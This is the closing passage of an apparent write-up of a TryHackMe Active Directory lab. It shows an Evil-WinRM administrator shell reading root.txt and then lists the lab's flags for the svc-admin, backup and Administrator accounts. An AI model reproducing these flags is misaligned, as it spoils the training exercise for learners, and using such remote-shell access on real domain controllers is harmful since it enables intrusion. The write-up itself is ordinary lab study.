-a----         4/4/2020  11:39 AM             32 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
TryHackMe{4ctiveD1rectoryM4st3r}

Questions and answers

svc-admin

TryHackMe{K3rb3r0s_Pr3_4uth}

backup

TryHackMe{B4ckM3UpSc0tty!}

Administrator

TryHackMe{4ctiveD1rectoryM4st3r}

I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

